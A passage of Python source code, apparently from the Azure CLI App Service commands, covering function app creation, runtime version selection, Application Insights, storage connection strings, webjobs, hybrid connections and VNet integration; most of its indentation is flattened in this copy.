if not plan_info:
raise CLIError("The plan '{}' doesn't exist".format(plan))
location = plan_info.location
is_linux = plan_info.reserved
functionapp_def.server_farm_id = plan
functionapp_def.location = location
if functions_version == '2' and functionapp_def.location in FUNCTIONS_NO_V2_REGIONS:
raise CLIError("2.x functions are not supported in this region. To create a 3.x function, "
"pass in the flag '--functions-version 3'")
if is_linux and not runtime and (consumption_plan_location or not deployment_container_image_name):
        raise CLIError(
            "usage error: --runtime RUNTIME required for Linux function apps without a custom image.")
runtime_stacks_json = _load_runtime_stacks_json_functionapp(is_linux)
if runtime is None and runtime_version is not None:
raise CLIError('Must specify --runtime to use --runtime-version')
# get the matching runtime stack object
runtime_json = _get_matching_runtime_json_functionapp(runtime_stacks_json, runtime if runtime else 'dotnet')
if not runtime_json:
# no matching runtime for os
os_string = "linux" if is_linux else "windows"
supported_runtimes = list(map(lambda x: x[KEYS.NAME], runtime_stacks_json))
raise CLIError("usage error: Currently supported runtimes (--runtime) in {} function apps are: {}."
.format(os_string, ', '.join(supported_runtimes)))
runtime_version_json = _get_matching_runtime_version_json_functionapp(runtime_json,
functions_version,
runtime_version,
is_linux)
if not runtime_version_json:
supported_runtime_versions = list(map(lambda x: x[KEYS.DISPLAY_VERSION],
_get_supported_runtime_versions_functionapp(runtime_json,
functions_version)))
if runtime_version:
if runtime == 'dotnet':
raise CLIError('--runtime-version is not supported for --runtime dotnet. Dotnet version is determined '
'by --functions-version. Dotnet version {} is not supported by Functions version {}.'
.format(runtime_version, functions_version))
raise CLIError('--runtime-version {} is not supported for the selected --runtime {} and '
'--functions-version {}. Supported versions are: {}.'
.format(runtime_version,
runtime,
functions_version,
', '.join(supported_runtime_versions)))
# if runtime_version was not specified, then that runtime is not supported for that functions version
raise CLIError('no supported --runtime-version found for the selected --runtime {} and '
'--functions-version {}'
.format(runtime, functions_version))
if runtime == 'dotnet':
logger.warning('--runtime-version is not supported for --runtime dotnet. Dotnet version is determined by '
'--functions-version. Dotnet version will be %s for this function app.',
runtime_version_json[KEYS.DISPLAY_VERSION])
if runtime_version_json[KEYS.IS_DEPRECATED]:
logger.warning('%s version %s has been deprecated. In the future, this version will be unavailable. '
'Please update your command to use a more recent version. For a list of supported '
'--runtime-versions, run \"az functionapp create -h\"',
runtime_json[KEYS.PROPERTIES][KEYS.DISPLAY], runtime_version_json[KEYS.DISPLAY_VERSION])
site_config_json = runtime_version_json[KEYS.SITE_CONFIG_DICT]
app_settings_json = runtime_version_json[KEYS.APP_SETTINGS_DICT]
con_string = _validate_and_get_connection_string(cmd.cli_ctx, resource_group_name, storage_account)
if is_linux:
functionapp_def.kind = 'functionapp,linux'
functionapp_def.reserved = True
is_consumption = consumption_plan_location is not None
if not is_consumption:
site_config.app_settings.append(NameValuePair(name='MACHINEKEY_DecryptionKey',
value=str(hexlify(urandom(32)).decode()).upper()))
if deployment_container_image_name:
functionapp_def.kind = 'functionapp,linux,container'
site_config.app_settings.append(NameValuePair(name='DOCKER_CUSTOM_IMAGE_NAME',
value=deployment_container_image_name))
site_config.app_settings.append(NameValuePair(name='FUNCTION_APP_EDIT_MODE', value='readOnly'))
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='false'))
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
# clear all runtime specific configs and settings
site_config_json = {KEYS.USE_32_BIT_WORKER_PROC: False}
app_settings_json = {}
# ensure that app insights is created if not disabled
runtime_version_json[KEYS.APPLICATION_INSIGHTS] = True
else:
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='true'))
else:
functionapp_def.kind = 'functionapp'
# set site configs
for prop, value in site_config_json.items():
snake_case_prop = _convert_camel_to_snake_case(prop)
setattr(site_config, snake_case_prop, value)
# temporary workaround for dotnet-isolated linux consumption apps
if is_linux and consumption_plan_location is not None and runtime == 'dotnet-isolated':
site_config.linux_fx_version = ''
# adding app settings
for app_setting, value in app_settings_json.items():
site_config.app_settings.append(NameValuePair(name=app_setting, value=value))
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION',
value=_get_extension_version_functionapp(functions_version)))
site_config.app_settings.append(NameValuePair(name='AzureWebJobsStorage', value=con_string))
# If plan is not consumption or elastic premium, we need to set always on
if consumption_plan_location is None and not is_plan_elastic_premium(cmd, plan_info):
site_config.always_on = True
# If plan is elastic premium or windows consumption, we need these app settings
is_windows_consumption = consumption_plan_location is not None and not is_linux
if is_plan_elastic_premium(cmd, plan_info) or is_windows_consumption:
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTAZUREFILECONNECTIONSTRING',
value=con_string))
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTSHARE', value=name.lower()))
create_app_insights = False
if app_insights_key is not None:
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=app_insights_key))
elif app_insights is not None:
instrumentation_key = get_app_insights_key(cmd.cli_ctx, resource_group_name, app_insights)
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=instrumentation_key))
elif disable_app_insights or not runtime_version_json[KEYS.APPLICATION_INSIGHTS]:
# set up dashboard if no app insights
site_config.app_settings.append(NameValuePair(name='AzureWebJobsDashboard', value=con_string))
elif not disable_app_insights and runtime_version_json[KEYS.APPLICATION_INSIGHTS]:
create_app_insights = True
poller = client.web_apps.create_or_update(resource_group_name, name, functionapp_def)
functionapp = LongRunningOperation(cmd.cli_ctx)(poller)
if consumption_plan_location and is_linux:
logger.warning("Your Linux function app '%s', that uses a consumption plan has been successfully "
"created but is not active until content is published using "
"Azure Portal or the Functions Core Tools.", name)
else:
_set_remote_or_local_git(cmd, functionapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
if create_app_insights:
try:
try_create_application_insights(cmd, functionapp)
except Exception: # pylint: disable=broad-except
            logger.warning('Error while trying to create and configure an Application Insights resource for the '
                           'Function App. Please use the Azure Portal to create and configure it, if needed.')
update_app_settings(cmd, functionapp.resource_group, functionapp.name,
['AzureWebJobsDashboard={}'.format(con_string)])
if deployment_container_image_name:
update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url,
deployment_container_image_name, docker_registry_server_user,
docker_registry_server_password)
if assign_identities is not None:
identity = assign_identity(cmd, resource_group_name, name, assign_identities,
role, None, scope)
functionapp.identity = identity
return functionapp
def _load_runtime_stacks_json_functionapp(is_linux):
KEYS = FUNCTIONS_STACKS_API_KEYS()
if is_linux:
return get_file_json(FUNCTIONS_STACKS_API_JSON_PATHS['linux'])[KEYS.VALUE]
return get_file_json(FUNCTIONS_STACKS_API_JSON_PATHS['windows'])[KEYS.VALUE]
def _get_matching_runtime_json_functionapp(stacks_json, runtime):
KEYS = FUNCTIONS_STACKS_API_KEYS()
matching_runtime_json = list(filter(lambda x: x[KEYS.NAME] == runtime, stacks_json))
if matching_runtime_json:
return matching_runtime_json[0]
return None
def _get_supported_runtime_versions_functionapp(runtime_json, functions_version):
KEYS = FUNCTIONS_STACKS_API_KEYS()
extension_version = _get_extension_version_functionapp(functions_version)
supported_versions_list = []
for runtime_version_json in runtime_json[KEYS.PROPERTIES][KEYS.MAJOR_VERSIONS]:
if extension_version in runtime_version_json[KEYS.SUPPORTED_EXTENSION_VERSIONS]:
supported_versions_list.append(runtime_version_json)
return supported_versions_list
def _get_matching_runtime_version_json_functionapp(runtime_json, functions_version, runtime_version, is_linux):
KEYS = FUNCTIONS_STACKS_API_KEYS()
extension_version = _get_extension_version_functionapp(functions_version)
if runtime_version:
for runtime_version_json in runtime_json[KEYS.PROPERTIES][KEYS.MAJOR_VERSIONS]:
if (runtime_version_json[KEYS.DISPLAY_VERSION] == runtime_version and
extension_version in runtime_version_json[KEYS.SUPPORTED_EXTENSION_VERSIONS]):
return runtime_version_json
return None
# find the matching default runtime version
supported_versions_list = _get_supported_runtime_versions_functionapp(runtime_json, functions_version)
default_version_json = {}
default_version = 0.0
for current_runtime_version_json in supported_versions_list:
if current_runtime_version_json[KEYS.IS_DEFAULT]:
current_version = _get_runtime_version_functionapp(current_runtime_version_json[KEYS.RUNTIME_VERSION],
is_linux)
if not default_version_json or default_version < current_version:
default_version_json = current_runtime_version_json
default_version = current_version
return default_version_json
def _get_extension_version_functionapp(functions_version):
if functions_version is not None:
return '~{}'.format(functions_version)
return '~2'
def _get_app_setting_set_functionapp(site_config, app_setting):
return list(filter(lambda x: x.name == app_setting, site_config.app_settings))
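# Converts camelCase stack-config keys to the SDK's snake_case attribute names,
# e.g. 'netFrameworkVersion' -> 'net_framework_version' (illustrative input).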
def _convert_camel_to_snake_case(text):
return reduce(lambda x, y: x + ('_' if y.isupper() else '') + y, text).lower()
def _get_runtime_version_functionapp(version_string, is_linux):
import re
windows_match = re.fullmatch(FUNCTIONS_WINDOWS_RUNTIME_VERSION_REGEX, version_string)
if windows_match:
return float(windows_match.group(1))
linux_match = re.fullmatch(FUNCTIONS_LINUX_RUNTIME_VERSION_REGEX, version_string)
if linux_match:
return float(linux_match.group(1))
try:
return float(version_string)
except ValueError:
return 0
def try_create_application_insights(cmd, functionapp):
    creation_failed_warn = 'Unable to create an Application Insights resource for the Function App. ' \
                           'Please use the Azure Portal to manually create and configure it, if needed.'
ai_resource_group_name = functionapp.resource_group
ai_name = functionapp.name
ai_location = functionapp.location
app_insights_client = get_mgmt_service_client(cmd.cli_ctx, ApplicationInsightsManagementClient)
ai_properties = {
"name": ai_name,
"location": ai_location,
"kind": "web",
"properties": {
"Application_Type": "web"
}
}
appinsights = app_insights_client.components.create_or_update(ai_resource_group_name, ai_name, ai_properties)
if appinsights is None or appinsights.instrumentation_key is None:
logger.warning(creation_failed_warn)
return
    # We make this success message a warning so it does not interfere with regular JSON output in stdout
logger.warning('Application Insights \"%s\" was created for this Function App. '
'You can visit https://portal.azure.com/#resource%s/overview to view your '
'Application Insights component', appinsights.name, appinsights.id)
update_app_settings(cmd, functionapp.resource_group, functionapp.name,
['APPINSIGHTS_INSTRUMENTATIONKEY={}'.format(appinsights.instrumentation_key)])
def _set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None):
if deployment_source_url:
logger.warning("Linking to git repository '%s'", deployment_source_url)
try:
config_source_control(cmd, resource_group_name, name, deployment_source_url, 'git',
deployment_source_branch, manual_integration=True)
except Exception as ex: # pylint: disable=broad-except
ex = ex_handler_factory(no_throw=True)(ex)
logger.warning("Link to git repository failed due to error '%s'", ex)
if deployment_local_git:
local_git_info = enable_local_git(cmd, resource_group_name, name)
logger.warning("Local git is configured with url of '%s'", local_git_info['url'])
setattr(webapp, 'deploymentLocalGitUrl', local_git_info['url'])
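# Resolves the storage account (by name or resource ID), verifies it exposes blob, queue and table
# endpoints and uses an allowed SKU, then builds an AzureWebJobsStorage connection string from the
# first account key.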
def _validate_and_get_connection_string(cli_ctx, resource_group_name, storage_account):
sa_resource_group = resource_group_name
if is_valid_resource_id(storage_account):
sa_resource_group = parse_resource_id(storage_account)['resource_group']
storage_account = parse_resource_id(storage_account)['name']
storage_client = get_mgmt_service_client(cli_ctx, StorageManagementClient)
storage_properties = storage_client.storage_accounts.get_properties(sa_resource_group,
storage_account)
error_message = ''
endpoints = storage_properties.primary_endpoints
sku = storage_properties.sku.name
allowed_storage_types = ['Standard_GRS', 'Standard_RAGRS', 'Standard_LRS', 'Standard_ZRS', 'Premium_LRS']
for e in ['blob', 'queue', 'table']:
if not getattr(endpoints, e, None):
error_message = "Storage account '{}' has no '{}' endpoint. It must have table, queue, and blob endpoints all enabled".format(storage_account, e) # pylint: disable=line-too-long
if sku not in allowed_storage_types:
error_message += 'Storage type {} is not allowed'.format(sku)
if error_message:
raise CLIError(error_message)
obj = storage_client.storage_accounts.list_keys(sa_resource_group, storage_account) # pylint: disable=no-member
try:
keys = [obj.keys[0].value, obj.keys[1].value] # pylint: disable=no-member
except AttributeError:
# Older API versions have a slightly different structure
keys = [obj.key1, obj.key2] # pylint: disable=no-member
endpoint_suffix = cli_ctx.cloud.suffixes.storage_endpoint
connection_string = 'DefaultEndpointsProtocol={};EndpointSuffix={};AccountName={};AccountKey={}'.format(
"https",
endpoint_suffix,
storage_account,
keys[0]) # pylint: disable=no-member
return connection_string
def list_consumption_locations(cmd):
client = web_client_factory(cmd.cli_ctx)
regions = client.list_geo_regions(sku='Dynamic')
return [{'name': x.name.lower().replace(' ', '')} for x in regions]
def list_locations(cmd, sku, linux_workers_enabled=None):
web_client = web_client_factory(cmd.cli_ctx)
full_sku = get_sku_name(sku)
web_client_geo_regions = web_client.list_geo_regions(sku=full_sku, linux_workers_enabled=linux_workers_enabled)
providers_client = providers_client_factory(cmd.cli_ctx)
providers_client_locations_list = getattr(providers_client.get('Microsoft.Web'), 'resource_types', [])
for resource_type in providers_client_locations_list:
if resource_type.resource_type == 'sites':
providers_client_locations_list = resource_type.locations
break
return [geo_region for geo_region in web_client_geo_regions if geo_region.name in providers_client_locations_list]
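# Polls the Kudu deployment status URL every 2 seconds (status 3 = failed, 4 = succeeded) until the
# timeout is reached; with no explicit timeout this allows 450 trials, i.e. roughly 15 minutes.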
def _check_zip_deployment_status(cmd, rg_name, name, deployment_status_url, authorization, timeout=None):
import requests
from azure.cli.core.util import should_disable_connection_verify
total_trials = (int(timeout) // 2) if timeout else 450
num_trials = 0
while num_trials < total_trials:
time.sleep(2)
response = requests.get(deployment_status_url, headers=authorization,
verify=not should_disable_connection_verify())
try:
res_dict = response.json()
except json.decoder.JSONDecodeError:
logger.warning("Deployment status endpoint %s returns malformed data. Retrying...", deployment_status_url)
res_dict = {}
finally:
num_trials = num_trials + 1
if res_dict.get('status', 0) == 3:
_configure_default_logging(cmd, rg_name, name)
raise CLIError("Zip deployment failed. {}. Please run the command az webapp log deployment show "
"-n {} -g {}".format(res_dict, name, rg_name))
if res_dict.get('status', 0) == 4:
break
if 'progress' in res_dict:
logger.info(res_dict['progress']) # show only in debug mode, customers seem to find this confusing
# if the deployment is taking longer than expected
if res_dict.get('status', 0) != 4:
_configure_default_logging(cmd, rg_name, name)
raise CLIError("""Timeout reached by the command, however, the deployment operation
is still on-going. Navigate to your scm site to check the deployment status""")
return res_dict
def list_continuous_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_continuous_web_jobs', slot)
def start_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.start_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.start_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def stop_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.stop_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.stop_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def remove_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_continuous_web_job(resource_group_name, name, webjob_name)
def list_triggered_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_triggered_web_jobs', slot)
def run_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.run_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.run_triggered_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_triggered_web_job(resource_group_name, name, webjob_name)
def remove_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_triggered_web_job(resource_group_name, name, webjob_name)
def list_hc(cmd, name, resource_group_name, slot=None):
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
return logger.warning("hybrid connections not supported on a linux app.")
client = web_client_factory(cmd.cli_ctx)
if slot is None:
listed_vals = client.web_apps.list_hybrid_connections(resource_group_name, name)
else:
listed_vals = client.web_apps.list_hybrid_connections_slot(resource_group_name, name, slot)
# reformats hybrid connection, to prune unnecessary fields
mod_list = []
for x in listed_vals.additional_properties["value"]:
properties = x["properties"]
resourceGroup = x["id"].split("/")
mod_hc = {
"id": x["id"],
"location": x["location"],
"name": x["name"],
"properties": {
"hostname": properties["hostname"],
"port": properties["port"],
"relayArmUri": properties["relayArmUri"],
"relayName": properties["relayName"],
"serviceBusNamespace": properties["serviceBusNamespace"],
"serviceBusSuffix": properties["serviceBusSuffix"]
},
"resourceGroup": resourceGroup[4],
"type": x["type"]
}
mod_list.append(mod_hc)
return mod_list
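# Attaches a Service Bus Relay hybrid connection to the app (or slot): finds the Relay namespace,
# ensures a 'defaultSender' send authorization rule exists, reads the endpoint host:port from the
# hybrid connection metadata, and returns a pruned summary of the resulting binding.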
def add_hc(cmd, name, resource_group_name, namespace, hybrid_connection, slot=None):
HybridConnection = cmd.get_models('HybridConnection')
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
return logger.warning("hybrid connections not supported on a linux app.")
web_client = web_client_factory(cmd.cli_ctx)
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
namespace_client = namespaces_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
hy_co_id = ''
for n in namespace_client.list():
if n.name == namespace:
hy_co_id = n.id
i = 0
hy_co_resource_group = ''
hy_co_split = hy_co_id.split("/")
for z in hy_co_split:
if z == "resourceGroups":
hy_co_resource_group = hy_co_split[i + 1]
i = i + 1
# calling the relay API to get information about the hybrid connection
hy_co = hy_co_client.get(hy_co_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(hy_co_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name.lower() == "defaultsender":
for z in r.rights:
if z == z.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(hy_co_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(hy_co_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_info = hy_co.id
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
hy_co_hostname = ''
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
id_parameters = hy_co_info.split("/")
# populate object with information from the hybrid connection, and set it
# on webapp
hc = HybridConnection(service_bus_namespace=id_parameters[8],
relay_name=hybrid_connection,
relay_arm_uri=hy_co_info,
hostname=hostname,
port=port,
send_key_name="defaultSender",
send_key_value=hy_co_keys.primary_key,
service_bus_suffix=".servicebus.windows.net")
if slot is None:
return_hc = web_client.web_apps.create_or_update_hybrid_connection(resource_group_name, name, namespace,
hybrid_connection, hc)
else:
return_hc = web_client.web_apps.create_or_update_hybrid_connection_slot(resource_group_name, name, namespace,
hybrid_connection, hc, slot)
# reformats hybrid connection, to prune unnecessary fields
resourceGroup = return_hc.id.split("/")
mod_hc = {
"hostname": return_hc.hostname,
"id": return_hc.id,
"location": return_hc.additional_properties["location"],
"name": return_hc.name,
"port": return_hc.port,
"relayArmUri": return_hc.relay_arm_uri,
"resourceGroup": resourceGroup[4],
"serviceBusNamespace": return_hc.service_bus_namespace,
"serviceBusSuffix": return_hc.service_bus_suffix
}
return mod_hc
# set the key the apps use to connect with the hybrid connection
def set_hc_key(cmd, plan, resource_group_name, namespace, hybrid_connection, key_type):
HybridConnection = cmd.get_models('HybridConnection')
web_client = web_client_factory(cmd.cli_ctx)
# extract the hybrid connection resource group
asp_hy_co = web_client.app_service_plans.get_hybrid_connection(resource_group_name, plan,
namespace, hybrid_connection)
arm_uri = asp_hy_co.relay_arm_uri
split_uri = arm_uri.split("resourceGroups/")
resource_group_strings = split_uri[1].split('/')
relay_resource_group = resource_group_strings[0]
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
# calling the relay function to obtain information about the hc in question
hy_co = hy_co_client.get(relay_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(relay_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name.lower() == "defaultsender":
for z in r.rights:
if z == z.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(relay_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(relay_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
    hy_co_hostname = ''
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
key = "empty"
if key_type.lower() == "primary":
key = hy_co_keys.primary_key
elif key_type.lower() == "secondary":
key = hy_co_keys.secondary_key
    # ensures the key type input is valid
if key == "empty":
logger.warning("Key type is invalid - must be primary or secondary")
return
apps = web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan, namespace,
hybrid_connection)
# changes the key for every app that uses that hybrid connection
for x in apps:
app_info = ast.literal_eval(x)
app_name = app_info["name"]
app_id = app_info["id"]
id_split = app_id.split("/")
app_resource_group = id_split[4]
hc = HybridConnection(service_bus_namespace=namespace, relay_name=hybrid_connection,
relay_arm_uri=arm_uri, hostname=hostname, port=port, send_key_name="defaultSender",
send_key_value=key)
web_client.web_apps.update_hybrid_connection(app_resource_group, app_name, namespace,
hybrid_connection, hc)
return web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan,
namespace, hybrid_connection)
def appservice_list_vnet(cmd, resource_group_name, plan):
web_client = web_client_factory(cmd.cli_ctx)
return web_client.app_service_plans.list_vnets(resource_group_name, plan)
def remove_hc(cmd, resource_group_name, name, namespace, hybrid_connection, slot=None):
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
return logger.warning("hybrid connections not supported on a linux app.")
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return_hc = client.web_apps.delete_hybrid_connection(resource_group_name, name, namespace, hybrid_connection)
else:
return_hc = client.web_apps.delete_hybrid_connection_slot(resource_group_name, name, namespace,
hybrid_connection, slot)
return return_hc
def list_vnet_integration(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
result = list(client.web_apps.list_vnet_connections(resource_group_name, name))
else:
result = list(client.web_apps.list_vnet_connections_slot(resource_group_name, name, slot))
mod_list = []
    # reformats the vnet entry, removing unnecessary information
for x in result:
# removes GUIDs from name and id
longName = x.name
if '_' in longName:
usIndex = longName.index('_')
shortName = longName[usIndex + 1:]
else:
shortName = longName
v_id = x.id
lastSlash = v_id.rindex('/')
shortId = v_id[:lastSlash] + '/' + shortName
# extracts desired fields
certThumbprint = x.cert_thumbprint
location = x.additional_properties["location"]
v_type = x.type
vnet_resource_id = x.vnet_resource_id
id_strings = v_id.split('/')
resourceGroup = id_strings[4]
routes = x.routes
vnet_mod = {"certThumbprint": certThumbprint,
"id": shortId,
"location": location,
"name": shortName,
"resourceGroup": resourceGroup,
"routes": routes,
"type": v_type,
"vnetResourceId": vnet_resource_id}
mod_list.append(vnet_mod)
return mod_list
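# Adds regional VNet integration: validates the subnet, adds a Microsoft.Web/serverFarms delegation
# to it if missing, then creates the Swift virtual network connection on the app (or slot).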
def add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None):
SwiftVirtualNetwork = cmd.get_models('SwiftVirtualNetwork')
Delegation = cmd.get_models('Delegation', resource_type=ResourceType.MGMT_NETWORK)
client = web_client_factory(cmd.cli_ctx)
vnet_client = network_client_factory(cmd.cli_ctx)
subnet_resource_id = _validate_subnet(cmd.cli_ctx, subnet, vnet, resource_group_name)
if slot is None:
swift_connection_info = client.web_apps.get_swift_virtual_network_connection(resource_group_name, name)
else:
swift_connection_info = client.web_apps.get_swift_virtual_network_connection_slot(resource_group_name,
name, slot)
# check to see if the connection would be supported
if swift_connection_info.swift_supported is not True:
return logger.warning("""Your app must be in an Azure App Service deployment that is
capable of scaling up to Premium v2\nLearn more:
https://go.microsoft.com/fwlink/?linkid=2060115&clcid=0x409""")
subnet_id_parts = parse_resource_id(subnet_resource_id)
vnet_name = subnet_id_parts['name']
vnet_resource_group = subnet_id_parts['resource_group']
subnet_name = subnet_id_parts['child_name_1']
subnetObj = vnet_client.subnets.get(vnet_resource_group, vnet_name, subnet_name)
delegations = subnetObj.delegations
delegated = False
for d in delegations:
if d.service_name.lower() == "microsoft.web/serverfarms".lower():
delegated = True
if not delegated:
subnetObj.delegations = [Delegation(name="delegation", service_name="Microsoft.Web/serverFarms")]
vnet_client.subnets.begin_create_or_update(vnet_resource_group, vnet_name, subnet_name,
subnet_parameters=subnetObj)
swiftVnet = SwiftVirtualNetwork(subnet_resource_id=subnet_resource_id,
swift_supported=True)
if slot is None:
return_vnet = client.web_apps.create_or_update_swift_virtual_network_connection(resource_group_name, name,
swiftVnet)
else:
return_vnet = client.web_apps.create_or_update_swift_virtual_network_connection_slot(resource_group_name, name,
swiftVnet, slot)
# reformats the vnet entry, removing unnecessary information
id_strings = return_vnet.id.split('/')
resourceGroup = id_strings[4]
mod_vnet = {
"id": return_vnet.id,
"location": return_vnet.additional_properties["location"],
"name": return_vnet.name,
"resourceGroup": resourceGroup,
"subnetResourceId": return_vnet.subnet_resource_id
}
return mod_vnet
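# Accepts the subnet and vnet as either names or resource IDs and returns a full subnet resource ID;
# when several VNets share the given name, the one in the app's resource group is preferred.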
def _validate_subnet(cli_ctx, subnet, vnet, resource_group_name):
subnet_is_id = is_valid_resource_id(subnet)
if subnet_is_id:
subnet_id_parts = parse_resource_id(subnet)
vnet_name = subnet_id_parts['name']
if not (vnet_name.lower() == vnet.lower() or subnet.startswith(vnet)):
logger.warning('Subnet ID is valid. Ignoring vNet input.')
return subnet
vnet_is_id = is_valid_resource_id(vnet)
if vnet_is_id:
vnet_id_parts = parse_resource_id(vnet)
return resource_id(
subscription=vnet_id_parts['subscription'],
resource_group=vnet_id_parts['resource_group'],
namespace='Microsoft.Network',
type='virtualNetworks',
name=vnet_id_parts['name'],
child_type_1='subnets',
child_name_1=subnet)
# Reuse logic from existing command to stay backwards compatible
vnet_client = network_client_factory(cli_ctx)
list_all_vnets = vnet_client.virtual_networks.list_all()
vnets = []
for v in list_all_vnets:
if vnet in (v.name, v.id):
vnet_details = parse_resource_id(v.id)
vnet_resource_group = vnet_details['resource_group']
vnets.append((v.id, v.name, vnet_resource_group))
if not vnets:
return logger.warning("The virtual network %s was not found in the subscription.", vnet)
# If more than one vnet, try to use one from same resource group. Otherwise, use first and log the vnet resource id
found_vnet = [v for v in vnets if v[2].lower() == resource_group_name.lower()]
if not found_vnet:
found_vnet = [vnets[0]]
(vnet_id, vnet, vnet_resource_group) = found_vnet[0]
if len(vnets) > 1:
logger.warning("Multiple virtual networks of name %s were found. Using virtual network with resource ID: %s. "
"To use a different virtual network, specify the virtual network resource ID using --vnet.",
vnet, vnet_id)
vnet_id_parts = parse_resource_id(vnet_id)
return resource_id(
subscription=vnet_id_parts['subscription'],
resource_group=vnet_id_parts['resource_group'],
namespace='Microsoft.Network',
type='virtualNetworks',
name=vnet_id_parts['name'],
child_type_1='subnets',
child_name_1=subnet)
def remove_vnet_integration(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return_vnet = client.web_apps.delete_swift_virtual_network(resource_group_name, name)
else:
return_vnet = client.web_apps.delete_swift_virtual_network_slot(resource_group_name, name, slot)
return return_vnet
def get_history_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_triggered_web_job_history_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.list_triggered_web_job_history(resource_group_name, name, webjob_name)
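# 'az webapp up' helper: detects the OS and runtime from the source directory (or --runtime/--html),
# reuses an existing app's resource group, plan and SKU when the name is already taken, otherwise
# creates defaults for them, and honors --dryrun by returning the planned configuration as JSON.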
def webapp_up(cmd, name=None, resource_group_name=None, plan=None, location=None, sku=None, # pylint: disable=too-many-statements,too-many-branches
os_type=None, runtime=None, dryrun=False, logs=False, launch_browser=False, html=False):
if not name:
name = generate_default_app_name(cmd)
import os
AppServicePlan = cmd.get_models('AppServicePlan')
src_dir = os.getcwd()
_src_path_escaped = "{}".format(src_dir.replace(os.sep, os.sep + os.sep))
client = web_client_factory(cmd.cli_ctx)
user = get_profile_username()
_create_new_rg = False
_site_availability = get_site_availability(cmd, name)
_create_new_app = _site_availability.name_available
os_name = os_type if os_type else detect_os_form_src(src_dir, html)
_is_linux = os_name.lower() == 'linux'
